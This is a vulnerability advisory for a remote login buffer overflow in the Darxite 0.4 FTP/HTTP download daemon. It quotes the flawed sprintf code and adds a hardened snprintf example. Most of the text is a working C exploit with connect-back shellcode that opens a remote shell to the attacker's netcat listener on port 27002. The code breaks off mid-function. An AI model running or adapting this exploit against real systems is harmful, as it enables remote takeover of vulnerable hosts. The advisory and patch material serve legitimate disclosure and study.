Darxite 0.4 login handler buffer overflow vulnerability
2008-04-10 03:05:18 Source: Internet
Published: 2000-08-23
Updated: 2000-08-23
Affected systems:
Ashley Montanaro Darxite 0.4
- Linux 2.x
Description:
The Darxite daemon is used to download files over FTP or HTTP and to run FTP commands.
It does not properly check user-supplied data when processing a login: a very long username or
password triggers a remote buffer overflow. An attacker can remotely obtain the privileges the Darxite daemon runs with.
The problematic code is in Library/sockets.c:
char buffer[256];
..
sprintf(buffer, "%s\n", name);
..
sprintf(buffer, "%s\n", password);
<* Source: dethy (dethy@synnergy.net)
Scrippie (Scrippie/ronald@grafix.nl)
http://www.synnergy.net
*>
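To make the defect concrete, here is an added example (not Darxite's own code) that places the unbounded sprintf pattern from Library/sockets.c next to a bounded replacement. The bounded version uses snprintf's return value to detect that the field would not fit and rejects it instead of writing past the 256-byte buffer; the function names and the 300-byte test name are assumptions made for the example.

```c
/* Added example (not Darxite code): the unbounded sprintf pattern from
 * Library/sockets.c next to a bounded replacement that refuses over-long
 * input instead of overrunning the fixed 256-byte buffer. */
#include <stdio.h>
#include <string.h>

#define LOGIN_BUF 256   /* same size as the advisory's char buffer[256] */

/* Vulnerable shape (kept only for comparison, never call it with untrusted
 * data): sprintf copies all of name plus "\n" into a fixed buffer, so any
 * name longer than LOGIN_BUF - 2 bytes writes past the end of it. */
void format_login_unbounded(char *buffer, const char *name)
{
    sprintf(buffer, "%s\n", name);
}

/* Hardened shape: snprintf writes at most buflen bytes (including the
 * terminator), and its return value is the length the full output would
 * have had. A value >= buflen means the field was truncated; treat that as
 * a protocol error rather than silently sending a clipped credential.
 * Returns 0 on success, -1 when the input does not fit. */
int format_login_bounded(char *buffer, size_t buflen, const char *name)
{
    int needed = snprintf(buffer, buflen, "%s\n", name);
    if (needed < 0 || (size_t)needed >= buflen) {
        buffer[0] = '\0';   /* do not leave a partial line behind */
        return -1;
    }
    return 0;
}

/* Demonstration: a constructed 300-byte username, the kind of input the
 * advisory describes, is rejected by the bounded version (returns -1). */
int demo_oversized_name_rejected(void)
{
    char buffer[LOGIN_BUF];
    char longname[300];
    memset(longname, 'A', sizeof(longname) - 1);
    longname[sizeof(longname) - 1] = '\0';
    return format_login_bounded(buffer, sizeof(buffer), longname);
}
```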
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!
/*
Darxite Daemon v0.4 password authentication overflow
----------------------------------------------------
I tried to use some easy functions for string creation, and they seem to
work pretty quick (no more hours of frustration writing for loops :).
As always I used my own shellcode, you should do a "nc -l -p 27002" on the
machine you fill in as "your IP" and execute this - if it works you'll have
a shell in the netcat session.
-- Scrippie/ronald@grafix.nl
*/
/* Synnergy.net 2000 (c) */
#include <stdio.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <string.h>
#define DARX_BUF 1024
#define NUM_NOPS 1000
int xconnect(unsigned long, unsigned int);
void readBanner(int socket);
char *strcreat(char *, char *, int);
char *stralign(char *, int);
char *longToChar(unsigned long);
char hellcode[]=
"\xeb\x7a\x5e\x31\xc0\x31\xdb\x31\xd2\xb0\x66\xb3\x01\x8d\x4e"
"\x1c\xb2\x01\x89\x56\x20\xb2\x06\x89\x56\x24\xb2\x02\x89\x56"
"\x1c\xcd\x80\x89\x46\x18\x89\x16\x66\xc7\x46\x02\x69\x7a\x89"
"\x46\x1c\x8d\x06\x89\x46\x20\x80\xc2\x0e\x89\x56\x24\x31\xc0"
"\x04\x66\x80\xc3\x02\x8d\x4e\x1c\xcd\x80\x31\xc0\x04\x3f\x89"
"\xc2\x8b\x5e\x18\x31\xc9\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0"
"\x41\xcd\x80\x31\xc0\x8d\x7e\x0f\x80\xc1\x07\xf3\xaa\x04\x0b"
"\x8d\x5e\x08\x89\x5e\x10\x8d\x4e\x10\x31\xd2\xcd\x80\x31\xc0"
"\xfe\xc0\xcd\x80\xe8\x81\xff\xff\xff\x41\x41\x42\x42\xBB\xBB"
"\xBB\xBB\x2f\x62\x69\x6e\x2f\x73\x68";
int main(int argc, char **argv)
{
    int sd;
    unsigned int align=0;
    unsigned long sip, retaddy=0xbffff928;
    char *iploc, *evilstring;
    if(argc < 4) {
        printf("Use as: %s <target IP> <target port> <your ip> [ret addy] [align]\n", argv[0]);
        exit(0);
    }
    if((sip = inet_addr(argv[3])) == -1) {
        perror("inet_addr()");
        exit(-1);
    }
    if(argc > 4) retaddy = strtoul(argv[4], NULL, 16);
    if(argc > 5) align = atoi(argv[5]);
    printf("Using return address: 0x%lx\n", retaddy);
    printf("Using alignment: %d\n", align);
    /* Locate the IP position in the shellcode */
    iploc=(char *)strchr(hellcode, 0xBB);
    memcpy((void *) iploc, (void *) &sip, 4);
    /* Generate the overflow string */
    evilstring = strcreat(NULL, "A", align);
    /* We memory leak 5 bytes here, don't make a service out of this :) */
    evilstring = strcreat(evilstring, longToChar(retaddy), (DARX_BUF+8)>>2);
    evilstring = strcreat(evilstring, "\x90", NUM_NOPS);
    evilstring = strcreat(evilstring, hellcode, 1);
    sd = xconnect(inet_addr(argv[1]), atoi(argv[2]));
    printf("Connected... Now sending overflow...\n");
    send(sd, evilstring, strlen(evilstring)+1, 0);
    free(evilstring);
    return(0);
}
/*
Returns the socket descriptor to "ip" on "port"
*/
int xconnect(unsigned long ip, unsigned int port)
{
    struct sockaddr_in sa; /* Sockaddr */
    int sd;                /* Socket Descriptor */
    if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket()");
        exit(-1);
    }
    memset(&sa, 0x00, sizeof(struct sockaddr_in));
    sa.sin_port=htons(port);